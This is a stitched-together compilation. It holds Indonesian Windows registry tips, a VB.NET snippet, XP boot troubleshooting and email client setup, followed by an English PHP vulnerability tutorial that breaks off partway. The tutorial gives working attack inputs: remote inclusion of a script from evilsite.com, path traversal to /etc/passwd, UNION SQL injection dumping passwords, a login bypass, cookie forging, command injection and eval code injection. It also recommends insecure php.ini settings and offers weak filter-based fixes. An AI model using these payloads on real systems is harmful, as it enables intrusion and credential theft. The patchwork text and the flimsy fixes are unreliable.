Data: (0 = disabled, 1 = enabled)
Menyembunyikan semua item pada desktop
Setting berikut akan menyembunyikan semua item yang terdapat pada desktop Anda.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name : NoDesktop
Data Type : DWORD Value
Data : (0 = disabled, 1 = enabled)
Menyembunyikan drive pada My Computer
Anda bisa menyembunyikan drive pada My Computer dengan cara masuk ke :
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name : NoDrives
Data Type : DWORD Value
Data :
Pada data bisa Anda isi dengan drive yang ingin Anda sembunyikan. Adapun nilainya adalah :
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, ALL: 67108863
Menyembunyikan icon Network Neighborhood
Icon Network Neigborhood akan nampak pada desktop jika Anda menginstall Windows Networking. Jika Anda tidak suka, Anda bisa menyembunyikan icon tersebut.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer
Value Name: NoNetHood
Data Type: DWORD Value
Data: (0 = disabled, 1 = enabled/menyembunyikan icon)
Menghilangkan panah pada shortcut
Kalau kita membuat shortcut dari suatu aplikasi atau pun directory pasti akan kita lihat sebuah panah kecil. Dari segi penampilan, panah yang menutupi sebagian icon tersebut sangat menjengkelkan. Apalagi jika kita ingin menonjolkan gambar icon tersebut. Untuk itu ada sebuah cara untuk menghapus panah tersebut sehingga penampilan icon kita lebih menarik. Caranya buka registry editor, hapus string value “IsShortcut” yang ada di dalam subkey “lnkfile” dan “piffile” pada key “HKEY_CLASSES_ROOT” dari registry windows anda.
Mencegah akses ke Control Panel > Passwords
Kalau Anda pengen mengamankan komputer Anda, mencegah seseorang mengganti password Windows Anda, gunakan tips berikut ini.
Key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
Value Name : NoSecCPL
Data Type : DWORD Value
Data : (0 = disabled, 1 = enabled)
Mematikan komputer dalam jangka waktu yang kita inginkan
Pindahkan file shutdown dari c:\windows\system32\shutdown.exe ke dekstop (atau kemana saja tergantung selera dan keinginan kita).
Klik kanan shortcut-nya lalu klik properties. kemudian pada target, tambahkan : c:\windows\system32\shutdown.exe -s -t 1800.
Catatan :
1800 adalah hitungan komputer akan mati dalam detik. jadi setelah 1800 detik (30 menit) maka komputer akan mati sendiri. jadi hitungan mundur agar komputer kita mati tergantung kita, jadi kita bisa menambahkan atau menguranginya.
dengan memindahkan file shutdown yang sudah dimodifikasi tadi ke start up, maka komputer akan mati dengan sendirinya.
Mencegah network terputus saat standby
My Computer – Properties – Device Manager
Klik kanan ethernet card – Properties – Power Management
Uncheck option “Allow the computer to turn off this device to save power”
Mempercepat tampilan menu START
Klik START -> RUN -> ketik REGEDIT.
Bakalan muncul window registry editor. Pencet F3/Ctrl+F, cari kata MenuShowDelay.
Di kolom sebelah kanan bakalan di highlighted bagian MenuShowDelaynya, double klik.
Ubah angka pada kolom MSD-nya. Secara default, angka yang tertera adalah 400. Silahkan ubah sesuka anda. Tapi yang jadi catatan, semakin kecil angkanya maka akan semakin cepat tampilan menu All Program di START menu. Dan sebaliknya, semakin besar, maka akan semakin memperlambat. Coba saja ganti dengan angka 0.
Klik OK. Tutup window regedit.
Restart komputer.
Klik START, rasakan perbedaannya. Enjoy it!
Refresh Isi Windows Explorer
Start > Run > regedit
Cari registry value “UpdateMode” pada HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update
ubah angka 0 mejadi 1 agar refresh lebih cepat.
Integer Family MaxValue
Integer Family MaxValue
Public Class Tester
Public Shared Sub Main
Dim result As New System.Text.StringBuilder()
result.AppendLine(“MaxValue…”)
Dim maxByte As Byte = Byte.MaxValue
Dim maxSByte As SByte = SByte.MaxValue
Dim maxShort As Short = Short.MaxValue
Dim maxUShort As UShort = UShort.MaxValue
Dim maxInteger As Integer = Integer.MaxValue
Dim maxUInteger As UInteger = UInteger.MaxValue
Dim maxLong As Long = Long.MaxValue
Dim maxULong As ULong = ULong.MaxValue
result.Append(“Byte “).AppendLine(maxByte)
result.Append(“SByte “).AppendLine(maxSByte)
result.Append(“Short “).AppendLine(maxShort)
result.Append(“UShort = “).AppendLine(maxUShort)
result.Append(“Integer = “).AppendLine(maxInteger)
result.Append(“UInteger = “).AppendLine(maxUInteger)
result.Append(“Long = “).AppendLine(maxLong)
result.Append(“ULong = “).AppendLine(maxULong)
Console.WriteLine(result.ToString())
End Sub
End Class
Output
MaxValue…
Byte 255
SByte 127
Short 32767
UShort = 65535
Integer = 2147483647
UInteger = 4294967295
Long = 9223372036854775807
ULong = 18446744073709551615
Windows XP Black Screen kemudian Restart
Gejalanya adalah: Saat komputer dinyalakan, sebelum masuk windows, layar menampilkan layar hitam dengan tulisan putih berisi pilihan sebagaimana gambar berikut:
…dan apapun pilihan anda komputer tidak akan bisa masuk windows, tetapi yang terjadi berikutnya adalah komputer akan restart lagi dan lagi dan lagi.
Hmm.. Masalahnya kejadian ini bisa disebabkan banyak hal dan berikut ini adalah beberapa kemungkinan PENYEBAB dan SOLUSINYA.
Langkah-langkah Penyelesaian masalahnya:
1. Coba pilih Safe Mode dari pilihan diatas. Kalau ternyata bisa masuk windows berarti masalahnya “kemungkinan” adalah di program anda yang jalan bersamaan start up windows atau driver windows anda. Kalau anda ingat masalah itu terjadi setelah anda menginstal suatu program atau driver coba anda remove program tersebut atau driver tersebut. Kalau tidak ingat coba anda hapus semua startup windows anda dengan cara: klik start-run-isikan msconfig- terus tekan ok-pilih pada menu yang atas start up, dan klik disable all. Restart komputer anda dan kalau menu masih muncul coba pilih Boot Normally.
2. Kalau dengan memilih Safe Mode ternyata komputer restart dan tetap tidak mau masuk windows, kemungkinannya adalah sbb:
* Harddisk anda ada error file/ bad sector. Solusi: tancapkan harddisk anda pada komputer lain yang dalam kondisi windowsnya normal, kalau saat mau masuk windows komputer tersebut meminta scandisk biarkan scandisk berjalan sampai selesai.
Kalau ternyata tidak minta scandisk otomatis maka saat sudah masuk windows lakukan scandisk manual. Caranya: start-run, isikan: cmd terus ok. pada menu dos tersebut ketikkan chkdsk /f x: terus enter, dimana x adalah posisi partisi dari system windows xp yang error. Misalkan harddisk anda yang windowsnya eror pas dilihat di windows explorer, drive systemnya (yang ada folder windowsnya) adalah di g maka perintah yang diketikkan adalah chkdsk /f g: setelah perintah itu di enter, maka komputer akan melakukan pengecekan pada partisi yang “mungkin” eror tersebut dimana /f artinya komputer akan melakukan autofix kalau ada masalah pada drive tersebut.
Kalau ternyata komputer tidak mau mengecek dengan alasan drive tersebut masih terpakai maka komputer akan menyarankan anda untuk melakukan pengecekan setelah komputer anda restart, maka kalau ini terjadi pilih y atau yes kemudian restart windows anda. Setelah itu sebelum masuk windows komputer otomatis akan mengecek lebih dahulu drive yang anda maksudkan tadi. Biarkan scandisk itu sampai selesai dan perhatikan dibagian akhir akan ada resume dari hasil pengecekan. Setelah itu shutdown komputer anda dan cabut harddisk yang bermasalah tersebut dan tancapkan kembali ke komputer awal, dan coba dinyalakan secara normal.
Kalau ternyata setelah pengecekan scandisk ternyata pada laporannya terdapat bad sector meskipun cuma 1KB paribasannya sebaiknya anda mengganti harddisk anda (dengan beli baru) dan sesegera mungkin membackup data2 anda, karena meskipun misalnya harddisk bad sector tersebut masih mau masuk windows dan lancar2 saja, dikemudian hari tetap akan menimbulkan banyak masalah. Kalau tidak ada bad sector cuma eror file maka harddisk anda masih layak untuk dipakai.
* Kemungkinan lainnya karena prosesor anda over heating. Solusi: Anda perlu mengecek di bios anda berapa temperatur CPU anda. Caranya adalah sesaat setelah komputer nyala, anda masuk bios.
Cara masuk bios bermacam2 bergantung merk boardnya, umumnya tekan del saat komputer baru nyala, kalau laptop umumnya tekan f2, kalau komputer build up compaq biasanya tekan f10, tapi ada juga yang tekan f1, anda lihat aja pas boot biasanya ada tulisan press “xx” to enter setup maka yang harus ditekan adalah tombol xx tersebut.
Setelah masuk bios carilah dalam menu2 tersebut yang berhubungan sama power dan carilah yang ada CPU temperature : yy derajat C. Kalau disitu tertera diatas 70 derajat celcius, misalnya 85 derajat celcius maka kemungkinannya adalah disebabkan prosesor anda overheating atawa kepanasan. Disini sebaiknya CPU berada pada temperature dibawah 60 derajat celcius. Kalau cpu anda overheating coba anda buka pendingin prosesor komputer anda mungkin ada kakinya yang patah atau pasta penghubung prosesor dengan heatsink dah gk bekerja dengan baik (jgn lupa dimatikan dulu sebelum bongkar2 biar gk kesetrum rek).
Kalau ada kaki yang patah sebaiknya anda ganti pendinginnya, kalau cuma pastanya kering dan tidak bekerja dengan baik, beli pastanya bersihkan sisa2 pasta lama di prosesor dan di heatsing, kasih pasta secukupnya di prosesor dan pasang kembali pendinginnya, atau kalu kisi2 pendinginnya dah kotor buanget dengan debu coba di bersihkan dengan sikat atau di blower (copot dulu kipasnya jadi gampang bersihin heatsinknya).
* Memory rusak atau tidak kompatible atau tidak selaras. Masalah memori bisa disebabkan banyak hal, beberapa diantaranya karena memori itu rusak, atau memori itu tidak kompatible (tidak cocok) untuk motherboard anda, atau karena anda memasang dua atau lebih memori dan dari keduanya tidak cocok satu dengan yang lain. Hal2 itu dapat menyebabkan black screen tersebut. Langkah2 nya adalah sebagi berikut: Kalau pada komputer anda tertancap dua buah memori atau lebih, cabut semuanya kemudian tancapkan satu saja, kemudian nyalakan komputer anda, kalau ternyata bisa masuk windows, berarti memori yang sedang tidak tertancap ada masalah (bisa rusak atau tidak kompatible dengan board dan atau tidak kompatible dengan memori yng sedang tertancap). Kalau masih tetap tidak mau masuk windows maka coba menancapkan memori satunya lagi.
Kalau memory anda cuma satu coba pindahkan dulu ke slot yang lain, karena bisa jadi slot memori nya yang bermasalah. Kalau ternyata dikedua atau tiga slot board anda tetap windowsnya gk normal, coba pinjem temen memory dengan merk lain. Kalau sebelumnya memory satu2nya yang nancap itu normal, kok tiba2 terjadi masalah black screen alternatifnya adalah coba anda pindah slot atau anda bersihkan kaki memorinya (yang bagian bawan berwarna keemasan) dengan menggunakan penghapus atau karet gelang yang anda gulung di pangkal pensil dan anda gosok kaki memori tersebut biar bersih (hanya kaki2nya jangan ic nya lho ya), setelah itu coba anda tancapkan lagi. Gambare kaya gini bersihin ram dengan penghapus:
* Kemungkinan berikutnya adalah windowsnya rusak, bisa karena filenya ada yang terserang virus atau terhapus karena tidak sengaja. Untuk sebab ini maka anda harus menginstal windows lagi.
Sementara ini hal2 diataslah yang saya tahu dapat menyebabkan terjadinya black screen diwindows xp. Semoga berguna… kalau anda menemukan hal lain yang menyebabkan black screen ada tulis aja di komentar dibawah… hehehe… goodluck
Cara setting microsoft outlook menggunakan gmail & atau yahoo !?
Microsoft Outlook digunakan untuk mengumpulkan informasi mail, newsgroup, dsb dr mail server yg berbeda. Jadi kita tinggal akses saja dr Outlook Express, ga usah login ke mail server yg bersangkutan. # Utk GMail, Anda harus mengaktifkan layanan POP di account GMail Anda. Caranya, login dulu ke GMail, masuk ke Settings dan aktifkan layanan POP. Berikut akan saya jelaskan cara setting jika kita ingin membuka account Gmail kita dengan menggunakan Outlook Express. Untuk membuka Gmail dengan Oulook Express kita dapat menggunakan diantara POP atau IMAP. Setting Gmail dengan Outlook Express menggunakan IMAP * Setting IMAP access di Gmail diaktifkan dengan cara masuk ke account Gmail terlebih dahulu dan klik menu setting yang ada dibagian kanan atas, setelah itu klik menu tab Forwarding and POP/IMAP. Kemudian IMAP access diaktifkan dan simpan perubahan. Setting Gmail * Klik Tools | Accounts… dari menu di program Outlook Express. * Klik Add. * Pilih Mail…. * Masukkan Nama. * Klik Next >. * Masukkan alamat di Gmail (misalkan “emailku@gmail.com”). * klik Next > sekali lagi. * Pilih IMAP dalam drop down menu My incoming mail server is a __ server. * Ketik “imap.gmail.com” di Incoming mail (POP3 or IMAP) server: field. * Ketik “smtp.gmail.com” di Outgoing mail (SMTP) server:. * Klik Next >. * Ketik user name pada Gmail di Account name: (contoh : “emailku”). * Masukkan Password di Gmail di Password: field. * Klik Next > sekali lagi. * Klik Finish. * Sorot imap.gmail.com di bagian Internet Accounts * Klik Properties. * Pilih tab menu Servers. * Kasih tanda cek pada My server requires authentication dibawah Outgoing Mail Server. * Pilih tab menu Advanced. * Kasih tanda cek pada This server requires a secure connection (SSL) dibawah Outgoing mail (SMTP): dan Incoming mail (IMAP):. * Ketik “465? di Outgoing server (SMTP):. * Klik OK. * Klik Close. * Sekarang, Pilih Yes untuk download daftar folder pada Gmail ke Outlook Express. * Klik OK. Setting Gmail dengan Outlook Express menggunakan POP * Setting POP access di Gmail diaktifkan dengan cara masuk ke account Gmail terlebih dahulu dan klik menu setting yang ada dibagian kanan atas, setelah itu klik menu tab Forwarding and POP/IMAP. Kemudian POP access diaktifkan, sesuaikan pilihan dengan kebutuhan dan simpan perubahan. * Klik Tools | Accounts… dari menu di program Outlook Express. * Klik Add. * Pilih Mail…. * Masukkan Nama. * Klik Next >. * Masukkan alamat di Gmail (misalkan “emailku@gmail.com”). * klik Next > sekali lagi. * Pilih POP3 dalam drop down menu My incoming mail server is a __ server. * Ketik “pop.gmail.com” di Incoming mail (POP3 or IMAP) server: field. * Ketik “smtp.gmail.com” di Outgoing mail (SMTP) server:. * Klik Next >. * Ketik user name pada Gmail di Account name: (contoh : “emailku”). * Masukkan Password di Gmail di Password: field. * Klik Next > sekali lagi. * Klik Finish. * Sorot pop.gmail.com di bagian Internet Accounts * Klik Properties. * Pilih tab menu Servers. * Kasih tanda cek pada My server requires authentication dibawah Outgoing Mail Server. * Pilih tab menu Advanced. * Kasih tanda cek pada This server requires a secure connection (SSL) dibawah Outgoing mail (SMTP): dan Incoming mail (POP3):. * Ketik “465? di Outgoing server (SMTP):. * Klik OK. * Klik Close. # Utk Yahoo, kalo Anda menggunakan extension mail @yahoo.com, maka layanan POP ini berbayar di YahooMail Plus. Utk extension mail @yahoo.co.id, setahu saya masih gratis. Setting Outlook untuk Yahoo! mail 1.Pastikan account anda adalah account yahoo lokal contoh:useranda@yahoo.co.id (penting), bukan yang yahoo.com, untuk yg yahoo.com harus ada tambahan software sebagai gatewaynya namanya YPops. 2.Login ke Yahoo mail anda, klik ‘Opsi’ yang ada di pojok kanan atas, lalu klik ‘akses penerusan surat’, lalu cheklist bagian ‘Akses Web & POP’, lalu klik ’simpan’. 3.Buka Outlook Express, Klik Tool -> Accounts -> Mail – lalu klik Add -> mail untuk membuat account. 4.Masukkan nama anda, nama ini akan digunakan sebagai nama pengirim di setiap email yg anda kirim. 5.Masukkan alamat email yahoo anda. ingat, yg .co.id bukan yang .com 6.Isi Incoming mail… dengan : pop.mail.yahoo.com 7.Isi Outgoing mail… dengan : smtp.mail.yahoo.com, klik NEXT. 8.Account Name : isi dengan Yahoo ID anda tanpa embel-embel @yahoo.co.id (cukup yahoo ID nya saja). contoh : email address=tejo@yahoo.co.id -> berarti yahoo ID nya = tejo. 9.Masukkan password yahoo anda, dan checklist bagian ‘remember password’. Klik NEXT, dan FINISH. 10.Pilih Account yg baru saja anda buat, lalu klik properties. Pilih Tab ‘Servers’ dan checklist bagian ‘My server requires authentication’ 11.Klik OK. (Done.. ) Sekarang, coba klik Send/Receive untuk mendownload email atau men-check apakah ada email yg masuk atau tidak.
Finding vulnerabilities in PHP scripts
1) About
2) Some stuff
3) Remote File Inclusion
3.0 – Basic example
3.1 – Simple example
3.2 – How to fix
4) Local File Inclusion
4.0 – Basic example
4.1 – Simple example
4.2 – How to fix
5) Local File Disclosure/Download
5.0 – Basic example
5.1 – Simple example
5.2 – How to fix
6) SQL Injection
6.0 – Basic example
6.1 – Simple example
6.2 – SQL Login Bypass
6.3 – How to fix
7) Insecure Cookie Handling
7.0 – Basic example
7.1 – Simple example
7.2 – How to fix
8) Remote Command Execution
8.0 – Basic example
8.1 – Simple example
8.2 – Advanced example
8.3 – How to fix
9) Remote Code Execution
9.0 – Basic example
9.1 – Simple example
9.2 – How to fix
10) Cross-Site Scripting
10.0 – Basic example
10.1 – Another example
10.2 – Simple example
10.3 – How to fix
11) Authentication Bypass
11.0 – Basic example
11.1 – Via login variable
11.2 – Unprotected Admin CP
11.3 – How to fix
12) Insecure Permissions
12.0 – Basic example
12.1 – Read the users/passwords
12.2 – Download backups
12.3 – INC files
12.4 – How to fix
13) Cross Site Request Forgery
13.0 – Basic example
13.1 – Simple example
13.2 – How to fix
14) Shoutz
1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.
2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :
safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ‘ ” and NUL’s with a backslash and we don’t want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )
How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.
3) Remote File Inclusion
- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )
In PHP is 4 functions through you can include code.
require – require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once – is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include – includes and evaluates the specified file.
include_once – includes and evaluates the specified file during the execution of the script.
3.0 – Basic example
- Tips : some scripts don’t accept “http” in variables,”http” word is forbbiden so
you can use “https” or “ftp”.
- Code snippet from test.php
———————————————–
$pagina=$_GET['pagina'];
include $pagina;
?>
———————————————–
- If we access the page we got some errors and some warnings( not pasted ) :
Notice: Undefined index: pagina in C:wampwww est.php on line 2
- We can see here that “pagina” variable is undeclared.We can set any value to “pagina” variable.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
Now I will show why some people use ? and %00 after the link to the evil script.
# The “%00″
- Code snippet from test.php
———————————————–
$pagina=$_GET['pagina'];
include $pagina.’.php’;
?>
———————————————–
- So if we will request
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
Will not work because the script will try to include http://evilsite.com/evilscript.txt.php
So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00
The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.
# The “?”
- Code snippet from test.php
———————————————–
$pagina=$_GET['pagina'];
include $pagina.’logged=1′;
?>
———————————————–
And the logged=1 will become like a variable.But better use nullbyte.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1
The evilscript will be included succesfully.
3.1 – Simple example
Now an example from a script.
- Code snippet from index.php
—————————————————-
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
…………………..etc………………
ob_start();
require_once($main_content);
—————————————————-
We can see that “main_content” variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the “main_content” variable is include.So if we make the
following request :
http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt
Our evil script will be successfully included.
3.2 – How to fix
Simple way : Don’t allow special chars in variables.Simple way : filter the slash “/” .
Another way : filter “http” , “https” , “ftp” and “smb”.
4) Local File Inclusion
- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use “..” instead of “../” .The “..” will become “..%5C” ( urlencoded ).
The same functions which let you to include (include,include_once,require,require_once) .
4.0 – Basic example
- Code snippet from test.php
———————————–
$pagina=$_GET['pagina'];
include ‘/pages/’.$pagina;
?>
———————————–
Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :
http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
The script will include “/pages/../../../../../../etc/passwd” successfully.
You can use the %00 and ? .The same story.
4.1 – Simple example
- Code snippet from install/install.php
————————————-
if(empty($_GET["url"]))
$url = ‘step_welcome.php’;
else
$url = $_GET["url"];
………….etc………….
————————————-
We can see that “url” variable is injectable.If the “url” variable is not set
(is empty) the script will include “step_welcome.php” else will include the
variable set by the attacker.
So if we do the following request :
http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd
The “etc/passwd” file will be succesfully included.
4.2 – How to fix
Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “” and “.” .
5) Local File Disclosure/Download
- Tips : Through this vulnerability you can read the content of files,not include.
Some functions which let you to read files :
file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()
5.0 – Basic example
- Code snippet from test.php
————————————–
$pagina=$_GET['pagina'];
readfile($pagina);
?>
————————————–
The readfile() function will read the content of the specified file.So if we do the following request :
http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
The content of etc/passwd will be outputed NOT included.
5.1 – Simple example
- Code snippet from download.php
———————————————————————————–
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header(“Pragma: public”);
header(“Expires: 0″);
header(“Cache-Control: must-revalidate, post-check=0, pre-check=0″);
header(“Content-Type: application/force-download”);
header( “Content-Disposition: attachment; filename=”.basename($file));
//header( “Content-Description: File Transfer”);
@readfile($file);
die();
———————————————————————————–
The “file” variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
So we can succesfully read the “etc/passwd” file.
5.2 – How to fix
Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “” and “.” .
6) SQL Injection
- Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.
6.0 – Basic example
- Code snippet from test.php
———————————————————————————-
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>
———————————————————————————-
The “id” variable is not filtered.We can inject our SQL code in “id” variable.Example :
http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–
And we get the “etc/passwd” file if magic_quotes = off ( escaping ‘ ) and users have
file privileges.
6.1 – Simple example
- Code snippet from house/listing_view.php
—————————————————————————————————————————–
$id = $_GET['itemnr'];
require_once($home.”mysqlinfo.php”);
$query = “SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id”;
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
—————————————————————————————————————————–
We see that “id” variable value is the value set for “itemnr” and is not filtered in any way.
So we can inject our code.Lets make a request :
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users–
And we get the email and the password from the users table.
6.2 – SQL Injection Login Bypass
- Code snippet from /admin/login.php
——————————————————————————————————————————
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(“
” . mysql_error() . “
“);
——————————————————————————————————————————
The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ‘ or ‘ 1=1
password : sirgod
We logged in.Why?Look,the code will become
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
Login bypassed.The username must be an existent username.
6.3 – How to fix
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / *
7) Insecure Cooke Handling
- Tips : Write the code in the URLbar,don’t use a cookie editor for this.
7.0 – Basic example
- Code snippet from test.php
—————————————————————
if($_POST['password'] == $thepass) {
setcookie(“is_user_logged”,”1″);
} else { die(“Login failed!”); }
………… etc ……………..
if($_COOKIE['is_user_logged']==”1″)
{ include “admin.php”; else { die(‘not logged’); }
—————————————————————
Something interesting here.If we set to the “is_user_logged” variable
from cookie value “1″ we are logged in.Example :
javascript:document.cookie = “is_user_logged=1; path=/”;
So practically we are logged in,we pass the check and we can access the admin panel.
7.1 – Simple example
- Code snippet from admin.php
—————————————————————-
if ($_COOKIE[PHPMYBCAdmin] == ”) {
if (!$_POST[login] == ‘login’) {
die(“Please Login:
name=password> type=submit>”);
} elseif($_POST[password] == $bcadminpass) {
setcookie(“PHPMYBCAdmin”,”LOGGEDIN”, time() + 60 * 60);
header(“Location: admin.php”); } else { die(“Incorrect”); }
}
—————————————————————-
Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :
javascript:document.cookie = “PHPMYBCAdmin=LOGGEDIN; path=/”;document.cookie = “1246371700; path=/”;
What is 1246371700? Is the current time() echo’ed + 360.
7.2 – How to fix
Simple way : The most simple and eficient way : use SESSIONS .
8) Remote Command Execution
- Tips : If in script is used exec() you can’t see the command output(but the command is executed)
until the result isn’t echo’ed from script.
You can use AND operator ( || ) if the script execute more than one command .
In PHP are some functions that let you to execute commands :
exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output
8.0 – Basic example
- Code snippet from test.php
———————————
$cmd=$_GET['cmd'];
system($cmd);
?>
———————————
So if we make the following request :
http://127.0.0.1/test.php?cmd=whoami
The command will be executed and the result will be outputed.
8.1 – Simple example
- Code snippet from dig.php
——————————————————————————————-
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
…………………… etc ……………………
$host = trim($host);
$host = strtolower($host);
echo(“Executing : dig @$ns $host $query_type
“);
echo ‘
‘;
system (“dig @$ns $host $query_type”);
——————————————————————————————-
The “ns” variable is unfiltered and can be specified by the attacker.An attacker can use any command
that he want through this variable.
Lets make a request :
http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging
The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
will not work of course.Lets do something a little bit tricky.We have the AND operator
( || ) and we will use it to separe the commands.Example :
http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
Our command will be executed.The command become “dig ||whoami|| sirgod.net NS”.
8.2 – Advanced example
– Code snippet from add_reg.php
——————————————————-
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = “./sites/”.$user.”.php”;
……………….etc………………….
$html = ” $regdate = “$date”;
$user = “$user”;
$pass = “$pass1″;
$email = “$email1″;
$location = “$location”;
$url = “$url”;
?>”;
$fp = fopen($filename, ‘a+’);
fputs($fp, $html) or die(“Could not open file!”);
——————————————————-
We can see that the script creates a php file in “sites” directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field,I choose the “location” variable.
So if we register as an user with the location (set the “location” value) :
the code inside sites/ourusername.php will become :
————————————————-
$regdate = “13 June 2009, 4:16 PM”;
$user = “pwned”;
$pass = “pwned”;
$email = “pwned@yahoo.com”;
$location = “”;
$url = “http://google.ro”;
?>
————————————————-
So we will get an parse error.Not good.We must inject a proper code to get the result that we want.
Lets inject this code :
“;?> $user = “pwned”;
$pass = “pwned”;
$email = “pwned@yahoo.com”;
$location = “”;?> $url = “http://google.ro”;
?>
————————————————————–
and we will have no error.Why?See the code :
$location = “”;?>
Lets split it :
——————————-
$location = “”;
?>
——————————-
We set the location value to “”,close the first php tags,open the tags
again,wrote our evil code,close the tags and open other and add a variable
“xxx” because we dont want any error.I wrote that code because I want no
error,can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).
So if we make the following request :
http://127.0.0.1/sites/ourusername.php?cmd=whoami
And our command will be succesfully executed.
8.3 – How to fix
Simple way : Don’t allow user input .
Another way : Use escapeshellarg() and escapeshellcmd() functions .
Example : $cmd=escapeshellarg($_GET’cmd’]);
9) Remote Code Execution
– Tips : You must inject valid PHP code including terminating statements ( ; ) .
9.0 – Basic example
– Code snippet from test.php
———————————–
$code=$_GET['code'];
eval($code);
?>
———————————–
The “eval” function evaluate a string as PHP code.So in this case we are able to execute
our PHP code.Examples :
http://127.0.0.1/test.php?code=phpinfo();
http://127.0.0.1/test.php?code=system(whoami);
And we will see the output of the PHP code injected by us.
9.1 – Simple example
– Code snippet from system/services/init.php
————————————————
$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )
————————————————
We see that the “anticode” is requested by $_REQUEST method and the coder
“secured” the input with “stripslashes” which is useless here,we don’t need
slashes to execute our php code only if we want to include a URL.So we can
inject our PHP code.Example :
http://127.0.0.1/test.php?anticode=phpinfo();
